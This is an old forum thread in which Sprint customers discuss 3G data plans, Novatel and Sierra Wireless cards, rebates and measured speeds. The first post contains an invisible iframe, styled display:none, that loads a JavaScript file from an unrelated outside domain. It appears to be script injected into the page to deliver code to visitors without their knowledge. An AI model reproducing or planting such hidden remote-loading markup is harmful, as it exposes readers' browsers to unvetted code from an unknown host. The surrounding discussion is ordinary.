+ Reply to Thread

3G data update/new sprint plans/same old CS

This post may turn into more of a rant and rave, but I will try to stay focused.

I decided today to change rate plans and add a 3G data card (Novatel) to my plan. So off to the Sprint PCS store I went. The CS rep there could not change my plan at the store, and sent me into a little booth they had set up with a landline to call CS. the change to an $85/month plan (2000 anytime minutes, additional 2nd line for free, unlimited N/W for $10, unlimited PCS and $5 wirelsss web access, plus I added a block of 500 text messages for another $10.) I use lots of text messages so I figured that I will have a better plan for $110/month. My bills average about $210/month now, mostly due to addtioal text message charges on my $149/month 10000 minute plan (2000/8000).

I was pretty pleased. Then nirvana struck. The girl on the phone said if I made it a vision plan, I could share the UNLIMITED data part of the vision plan with the Novatel data card. Very cool. I bought the card at the store and left to activate it . (I did not have my laptop with me).

At this point nirvana ended. I called back and found out that I was given the wrong info (imagine that) If I had a vision Treo phone, I COULD share the unlimited data part of the vision plan. I asked if she was sure, we talked to some other people, but that was their story and they were sticking to it. I knew it sounded too good to be true. I wonder if they will have the same unlimited data shareing when the 7135 comes out.

A little deflated, I chose a 40MB for $40 plan and will evaluate my useage over the next 3 months.

I have not had much time to play with the 3G card, but it did activate fine. I logged on to a few AS400 systems with a telnet emualtor and got sub second response time, which is what I would expect from a reasonable dial line. I checked out a few web pages (including this one), and the speed is MUCH better than my old Aircard 510 was. So far so good. I'll keep you posted on how the 3G card performs. One of the guys that works with me is out in Seattle for the weekend and just sent me a IM "3G rocks". I guess he had a good data connection with his novatel card.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by CarlGalgano; 10-25-2002 at 08:31 PM.
    Carl

3G data speeds update

Ok, you know you're a loser when you have to be the first to reply to your own thread!

I have had a little time to play with the 3G card, and so far, so good. I have a very marginal Sprint signal at my house (not sure why, I live in the middle of a major suburban location). My i300 only works sporatically, but at least it does work..... better than I can say for the AT&T phone I used to have. Some informal speed test using 2 wire's (www.2wire.com) bandwidth meter. I ran it 3 times, the lowest being 41Kbs, the next was 51kbp and the other was 78kbs. I'd rather not waste those precious Mbs on bandwidth test patterns, but was very please that the speed rivals a dial up, in most cases it is a little better. I can live with this. Most web pages load reasonable quick. I will be more apt to pull my laptop out of the bag at an airport and "check in" with these speeds. With the old Aircard 510, I only pulled it out if it was an emergency. (like an ebay auction was about to end. )

So far, 3G DATA does rock!
    Carl

Administrator

Arrow

hey carl,

is your card the voice and data or just data only?

did you get the 50 bucks off instant rebate on the card?

how much was it before any rebates (if any).

im going to grab the air card myself and get the unlimited vision added on my plan for 100 bucks/month. i have the 10K plan as you and ill probably get the 2500 daytime minute plan...

keep up the postings on your new toy! im going to wait until my cycle is up this month before i make any changes...

compatability

Is the wireless card a Cardbus or a PCMCIA Type I/II card? I'm a fan of Librettos - but they don't support Cardbus ...will my 5V type I/II slot work with this 3G card?

Administrator

Arrow

type II i believe...

Originally posted by Marctronixx
    type II i believe...
    Correct... type II
    Carl

Originally posted by Marctronixx
    hey carl,

is your card the voice and data or just data only?

did you get the 50 bucks off instant rebate on the card?

how much was it before any rebates (if any).

im going to grab the air card myself and get the unlimited vision added on my plan for 100 bucks/month. i have the 10K plan as you and ill probably get the 2500 daytime minute plan...

keep up the postings on your new toy! im going to wait until my cycle is up this month before i make any changes...
    Marc:
    I got the data only card from Novatel. The Sierra wireless card can also do voice via a headset jack, but the store did not have any and I do not see that as something I need. I also believe they dink you .20 for voice on thise cards.

The card was $199 before any rebate. Glad you mentioned this, because one of the guys I work with told me I thought he paid $149. Maybe he got the rebate. I will check. Maybe I can save another $50.

I had the 10K plan, but switched to the new $85 plan for 2000 anytime and unlimed N/W. You are correct there is another plan for 2500/unlimted, it is $100. Are you sure you need unlimited data for $100? I got a low plan to gauge my usage and will then adjust accordingly. I see the card useful in hotels in the evening when I am on the road, but most other places I hang out (my office, home or just about EVERY cleint) has some sort of high speed access in place. When the 3G speeds get in the T1 speeds, that is a different story. If I could drop my home DSL and "carry" my high speed network along with me, that would be cool.
    Carl

Administrator

Arrow

carl,

thank you for the update.

yeah, i am not too sure how much data i wil use up... im always out in the street and have my laptop with me always. i wont be downloading many pictures or anything graphic intensive so i may not need the unlimited..

il recheck the plans and see whats what...

we need to keep in touch Carl...

Ask a lot of questions when you call for data. There is so much conflicting info on the part of the Sprint cusotmer service reps. They were pretty clueless. I have seen on other boards that evidently there is a restriction if you get a vision plan with unlimited data that you are not allowed to use it to connect to a laptop via a data cable. So when the 7135 comes out you won't be able to (legally) use it as a wireless modem. That explains why they would not allow me to get a vision plan and share my new Novatel card. Can anyone out there with a Vision plan confirm this?
    Carl

Administrator

Arrow

yeah, it was posted that they are not going to release any data connection kits for the 3G phones and make us use the air cards. i personally think that is fine with me as i will rather have my laptop surf sans a phone and kit.

they dont want you to use the phone solely as your main isp at home so they will be monitoring accounts with excessive amount of data transfer.

i may go into my sprint store today and change my plan and grab a data card. i have printed out the new plans and will take it to the store so it wont be any discrepencies in which plan i want.

Marc:
    Good idea about taking the printed plans. I did the same thing. You said you saw it posted about the limited data policies of the 3G phones, was it here, on another message board or on Sprint's site. Someone on another site posted that they had used their phone as a data connection to his laptop. They've gotta sell the data cables or how else are we going to be able to sync the darn things (I actually perfer IR). The laptop card IS nice, but I do not see how they are going to keep anyone from using the phone as a wireless modem. I have a feeling that Sprint's market for 3G (downloading ringers and games) is not going to pan out. 3G is new right now and the competitionis limited. Soon we will have unlimited voice and data and I think the price point will be about $100.
    Carl

Someone posted that info here. I don't recall what thread but it was recent.

The red phone people told me the same thing about adding the card to my vision plan. I knew they were not the route to go. I just did it through the store's sales guy, he did it not knowing anything about the data/card on the phone vision plan. Just played dumb.

I also have the usb cable for my sanyo phone that willl allow me to dial up on it. I dont know if there are other cables around for other phone or not.